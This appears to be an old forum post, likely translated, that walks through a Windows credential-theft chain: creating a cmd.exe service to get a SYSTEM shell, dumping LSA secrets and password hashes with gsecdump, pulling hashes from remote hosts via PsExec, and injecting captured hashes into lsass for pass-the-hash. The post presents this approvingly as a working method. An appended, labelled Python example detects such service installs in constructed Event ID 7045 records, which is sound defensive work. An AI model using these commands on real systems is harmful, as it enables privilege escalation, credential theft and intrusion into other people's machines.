Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A hint: you can use iam from the pshtools toolkit to inject the hash information just captured with gsecdump into the local lsass process and so carry out a hash injection attack. The foreigners really are impressive; administrators will have their hands full now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, do not need to have their passwords cracked at all; it is just a matter of using the tool. As the original article puts it, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
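Added example, not part of this post or of the quoted article: both the `sc create` shell service and the PsExec step above leave a Windows System log Event ID 7045 ("A service was installed in the system") behind, and this Python scans constructed records modelled on that event's fields, flagging a shell interpreter registered as a service image or the PSEXESVC service name. The key="value" layout of the sample records is a constructed simplification, not the real event text.

```python
import re

# Constructed sample records for this example. They mirror the fields of
# Windows System log Event ID 7045 ("A service was installed in the system");
# the key="value" layout is a simplification, not the real event text.
SAMPLE_EVENTS = [
    'EventID=7045 ServiceName="shellcmdline" ServiceFileName="C:\\WINDOWS\\system32\\cmd.exe /K start"',
    'EventID=7045 ServiceName="PSEXESVC" ServiceFileName="%SystemRoot%\\PSEXESVC.exe"',
    'EventID=7045 ServiceName="Spooler" ServiceFileName="%SystemRoot%\\System32\\spoolsv.exe"',
    'EventID=7036 ServiceName="Spooler" State="running"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# A service whose image is a shell interpreter is a command prompt running as
# the service account, which is what `sc create ... binpath= "cmd.exe /K start"`
# on this page produces. Legitimate services are almost never registered this way.
SHELL_IMAGES = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")

def parse_event(line):
    """Turn one key=value record into a dict (quoted or bare values)."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}

def image_name(service_file_name):
    """Executable name from a service command line (quoted path or first token)."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', service_file_name)
    path = (m.group(1) or m.group(2)) if m else ""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def suspicious_reasons(event):
    """Why a 7045 service-install event deserves an analyst's attention."""
    if event.get("EventID") != "7045":
        return []
    reasons = []
    if image_name(event.get("ServiceFileName", "")) in SHELL_IMAGES:
        reasons.append("shell interpreter registered as service binary")
    if event.get("ServiceName", "").upper() == "PSEXESVC":
        # PsExec installs its remote helper under this fixed service name
        reasons.append("PsExec service install (remote execution)")
    return reasons

def scan(lines):
    """Return [(service name, reasons)] for every suspicious install event."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = suspicious_reasons(event)
        if reasons:
            hits.append((event.get("ServiceName", "?"), reasons))
    return hits
```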